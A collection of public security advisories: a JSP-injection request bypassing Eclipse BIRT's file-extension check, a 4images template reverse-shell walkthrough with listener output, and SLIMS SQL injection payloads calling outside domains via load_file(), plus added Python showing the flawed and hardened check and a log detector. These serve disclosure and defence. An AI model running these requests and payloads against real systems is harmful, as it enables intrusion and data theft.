/>-------------------------------------------------------------------------------<br />GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><% out.println("OS: " + System.getProperty("os.name")); out.println("Current dir: " + <br />getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> 
HTTP/1.1<br />Host: IP:18080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A<br />Upgrade-Insecure-Requests: 1<br /><br />-------------------------------------------------------------------------------<br /><br />-------------------------------------------------------------------------------<br />HTTP/1.1 200<br />Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly<br />Content-Type: text/html;charset=utf-8<br />Date: Wed, 05 Oct 2022 05:26:01 GMT<br />Connection: close<br />Content-Length: 283<br /><br /><html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head><br /><body style="background-color: #ECE9D8;"><br /><div style="font-size:10pt;"><font color="black"><br />The report document file has been generated successfully.</font><br /></div></body></html><br />-------------------------------------------------------------------------------<br /><br />This allows the execution of the provided `JSP` code, by calling<br />`/birt/test/info-new.jsp`.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested, but all versions <= 4.11 are vulnerable.<br />* 4.10.0 (2022-10-01)<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994)<br />2022-11-17: Vendor confirmed the bypass and is working on a fix.<br />2022-11-17: Vendor provided a fix.<br />2022-11-27: The fix was tested and could be bypassed again.<br />2022-11-27: Vendor acknowledged the bypass and provided a new fix.<br />2022-11-28: The fix was tested 
and we were not able to bypass it.<br />2022-11-30: Vendor releases patched version 4.12<br />2022-12-16: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />Update Eclipse BIRT to version 4.12 or newer from the vendor's website:<br />https://projects.eclipse.org/projects/technology.birt/releases/4.12.0<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Armin Stock / @2022<br /><br /></code></pre>
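Added example for the SEC Consult advisory above; it is the editor's code, not BIRT's. The patched `checkExtensionAllowedForRPTDocument` takes the text after the last `.` as the extension, so for `info-new.jsp/.` the last dot is the final character, `extIndex + 1` equals the string length, the whole `if` is skipped and the name is accepted. The Python transcription below reproduces that logic next to a hardened variant that normalizes the path and inspects only the final path component; the hardened variant is an illustration of the principle, not the vendor's 4.12 fix. The disallowed/allowed lists are sample values (BIRT reads them from its own configuration).

```python
import posixpath

# Sample lists for the demo; BIRT's real values come from the viewer configuration.
DISALLOWED = {"jsp", "jspx"}
ALLOWED = set()


def extension_check_original(name, disallowed=DISALLOWED, allowed=ALLOWED):
    """Line-for-line transcription of the Java check quoted in the advisory.
    Returns True when the name is accepted."""
    ext_index = name.rfind(".")
    valid = True
    if ext_index > -1 and ext_index + 1 < len(name):
        extension = name[ext_index + 1:]
        if disallowed and extension in disallowed:
            valid = False
        if allowed and extension not in allowed:
            valid = False
    # A trailing "." (as in "info-new.jsp/.") never enters the branch, so valid stays True.
    return valid


def extension_check_hardened(name, disallowed=DISALLOWED, allowed=ALLOWED):
    """Normalize first, then validate the extension of the final component only.
    Rejects names with no extension instead of silently accepting them."""
    normalized = posixpath.normpath(name.replace("\\", "/"))  # collapses "/." and "/x/.."
    base = posixpath.basename(normalized)
    root, dot, extension = base.rpartition(".")
    if not dot or not root or not extension:
        return False  # no extension, leading dot only, or trailing dot: reject
    extension = extension.lower()
    if disallowed and extension in disallowed:
        return False
    if allowed and extension not in allowed:
        return False
    return True


if __name__ == "__main__":
    for candidate in ("./test/info-new.jsp", "./test/info-new.jsp/.",
                      "./test/info-new.JSP", "output/report.rptdocument"):
        print(f"{candidate:<28} original={extension_check_original(candidate)!s:<6}"
              f" hardened={extension_check_hardened(candidate)}")
```

The general lesson is that any allow/deny decision on a file name has to be made on the same canonical form the filesystem will eventually use; checking the raw string leaves every decoding, normalization or trailing-component trick as a bypass.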
<pre><code># Exploit Title: 4images 1.9 - Remote Command Execution<br /># Exploit Author: Andrey Stoykov<br /># Software Link: https://www.4homepages.de/download-4images<br /># Version: 1.9<br /># Tested on: Ubuntu 20.04<br /><br /><br />To reproduce do the following:<br /><br />1. Login as administrator user<br />2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"<br />3. Select Template "categories.html"<br />4. Paste reverse shell code<br />5. Click "Save Changes"<br />6. Browse to "http://host/4images/categories.php?cat_id=1"<br /><br /><br />// HTTP POST request showing reverse shell payload<br /><br />POST /4images/admin/templates.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br />__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]<br /><br /><br /><br />// HTTP redirect response to specific template<br /><br />GET /4images/categories.php?cat_id=1 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0<br />[...]<br /><br /># nc -kvlp 4444<br />listening on [any] 4444 ...<br />connect to [127.0.0.1] from localhost [127.0.0.1] 43032<br />Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux<br /> 13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56<br />USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT<br />kali tty7 :0 11:58 2:18m 2:21 0.48s xfce4-session<br />kali pts/1 - 11:58 1:40 24.60s 0.14s sudo su<br />uid=1(daemon) gid=1(daemon) groups=1(daemon)<br />/bin/sh: 0: can't access tty; job control turned off<br />$<br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.2.2 a.k.a. SLIMS 9 Multiple SQLi - Session cookie not sanitized correctly.<br />## Author: nu11secur1ty<br />## Date: 12.20.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2<br />## Reference:<br />https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi<br /><br />## Description:<br />Manual insertion points 3, 4 and 5 appear to be vulnerable to SQL injection<br />attacks. The payload '+(select load_file('\\\\<br />azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+' was submitted<br />at manual insertion point 3.<br />This payload injects a SQL sub-query that calls MySQL's load_file function<br />with a UNC file path that references a URL on an external domain.<br />The application interacted with that domain, indicating that the injected<br />SQL query was executed.<br />Manual testing confirmed that the parameters class, collType and<br />membershipType are vulnerable to SQL injection.<br />An attacker can use this vulnerability to read information from every<br />database column of this system.<br />The session cookie is not sanitized correctly.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />00<br />---<br />Parameter: class (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or<br />GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\<br />716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select<br />load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+''<br />RLIKE (SELECT (CASE WHEN (2920=2920) THEN 0x62626262+(select<br />load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''+(select<br 
/>load_file(0x5c5c5c5c3172746239777132393937646638783478326364746d70346b76716f656532353574776a6a6237302e736c696d732e7765622e69645c5c617667))+''<br />ELSE 0x28 END)) AND 'xMPZ'='xMPZ&membershipType=a''&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id<br />\\dzd'))+'<br />---<br /><br />01<br />---<br />Parameter: collType (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or<br />GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\<br />716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select<br />load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a''&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+''<br />RLIKE (SELECT (CASE WHEN (2279=2279) THEN 0x61616161+(select<br />load_file(0x5c5c5c5c646374697930687a69777a643478756a6671716366643375756c306b6f61633166703666743968792e736c696d732e7765622e69645c5c777466))+''+(select<br />load_file(0x5c5c5c5c617a6469746d3536316837666b7533796a39397573386e653235387a77706b676e346575316f70642e736c696d732e7765622e69645c5c647a64))+''<br />ELSE 0x28 END)) AND 'MGZY'='MGZY<br />---<br /><br />03<br />---<br />Parameter: membershipType (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or<br />GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\<br />716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select<br />load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a'''<br />RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x612727 ELSE 0x28 END)) AND<br 
/>'ckmk'='ckmk&collType=aaaa'+(select load_file('\\\\<br />dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id<br />\\dzd'))+'<br />---<br />```<br /><br />## Reproduce:<br />[href](<br />https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi<br />)<br /><br />## Reference:<br />[Using HTTP cookies](<br />https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/1m0y6c)<br /><br />## Time spent<br />`00:35:00`<br /><br />## Writing an exploit<br />`00:15:00`<br /><br /></code></pre>
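A detection example, added here and not part of the advisory or of SLIMS: it scans web-server access-log lines for the markers of the blind SQLi payloads above (load_file() with a UNC path, its 0x5c5c5c5c hex-literal form, the RLIKE / CASE WHEN probe and the AND 'x'='x tail) in the class, collType and membershipType parameters. The request path, the log lines and the callback host are constructed, not taken from a real server.

```python
"""Flag access-log requests whose SLIMS report parameters carry the blind-SQLi
markers from the sqlmap output above.  Added detection example; log lines,
request path and callback host are constructed, not taken from a real server."""
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory names as injectable on the report page.
WATCHED = {"class", "collType", "membershipType"}

# Markers seen in the payloads.  0x5c5c5c5c is the MySQL hex literal for '\\\\',
# the UNC prefix sqlmap also inlines hex-encoded; the tautology is the AND 'x'='x tail.
MARKERS = {
    "load_file":   re.compile(r"load_file\s*\(", re.I),
    "unc_path":    re.compile(r"\\\\\\\\[\w.-]+\\\\|0x5c5c5c5c", re.I),
    "blind_rlike": re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S),
    "tautology":   re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1\b", re.I),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

def scan_query(url):
    """Map each watched, URL-decoded parameter to the markers it hits."""
    hits = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        found = [m for m, rx in MARKERS.items() if rx.search(value)]
        if name in WATCHED and found:
            hits[name] = found
    return hits

def scan_access_log(lines):
    """Return [(client_ip, {param: markers})] for every request that matched."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := scan_query(m.group(2))):
            alerts.append((m.group(1), hits))
    return alerts

# Constructed sample: a benign report request, one carrying the class= payload
# (placeholder callback host) and one carrying the hex-encoded collType= variant.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Dec/2022:10:00:01 +0000] "GET /admin/index.php?p=report'
    '&reportView=true&year=2002&class=Reference&membershipType=a&collType=Book HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Dec/2022:10:00:02 +0000] "GET /admin/index.php?p=report'
    "&reportView=true&year=2002&class=bbbb'%2B(select%20load_file('%5C%5C%5C%5Coob-callback.example"
    "%5C%5Cnbq'))%2B''%20RLIKE%20(SELECT%20(CASE%20WHEN%20(2920%3D2920)%20THEN%200x62626262"
    "%20ELSE%200x28%20END))%20AND%20'xMPZ'%3D'xMPZ&membershipType=a''&collType=aaaa HTTP/1.1\" 200 310",
    '203.0.113.9 - - [20/Dec/2022:10:00:03 +0000] "GET /admin/index.php?p=report'
    "&reportView=true&year=2002&class=a&membershipType=a&collType=aaaa'%2B(select%20load_file("
    "0x5c5c5c5c6f6f622d63616c6c6261636b2e6578616d706c655c5c777466))%2B'' HTTP/1.1\" 200 310",
]
```

The same markers in outbound DNS or SMB logs (a lookup of the host named inside the UNC path) corroborate that the injected query actually ran, which is the signal the advisory relies on.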